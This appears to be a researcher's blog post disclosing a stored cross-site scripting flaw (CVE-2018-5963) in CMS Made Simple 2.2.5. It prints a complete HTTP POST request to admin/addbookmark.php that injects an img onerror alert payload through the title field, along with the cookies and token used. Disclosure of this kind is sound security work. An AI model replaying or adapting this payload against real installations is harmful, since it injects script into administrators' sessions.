CVE-2018-5963CMS Made Simple (CMSMS) 2.2.5 has Stored XSS in admin/addbookmark.php via the title parameter.

After this request, website will pop-up

The Add Shortcut title field is not properly sanitized, thus leading to XSS.
POST /cmsms-2.2.5-install/admin/addbookmark.php?_sk_=24c1316d9651c78528d HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:57.0) Gecko/20100101 Firefox/57.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/
Content-Type: application/x-www-form-urlencoded
Content-Length: 104
Cookie: _sk_=24c1316d9651c78528d; 3e36c2b179d93f0eca459a97b9eda32a=ee958a481d387cb9a7aaddefc767cffddc9b8d8d%3A%3AYTo1OntzOjM6InVpZCI7aToxO3M6ODoidXNlcm5hbWUiO3M6NDoicm9vdCI7czo3OiJlZmZfdWlkIjtOO3M6MTI6ImVmZl91c2VybmFtZSI7TjtzOjU6ImNrc3VtIjtzOjQwOiI0NGU4ZGE0MjYxYTc2MzRhMjdmMjk1OGM5NzUzMzY1OWI1NjYwMDJjIjt9; SQLiteManager_currentLangue=2; CMSICbf982e8ecf=2dca056a03f34ef10994cef9e2b38d05; CMSSESSID6cbb6f8586d9=05871ce0719e96a874da643a9b5dc368
Connection: close
Upgrade-Insecure-Requests: 1
_sk_=24c1316d9651c78528d&title=%27%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E&url=adsf&addbookmark=true
I read lots of paper and website about this CMS. They don’t give bounty for using admin role. So i repot to mitre and got this CVE-2018-5963.
ref:
2 thoughts on “CMS 2.2.5 Stored Cross-Site Scripting”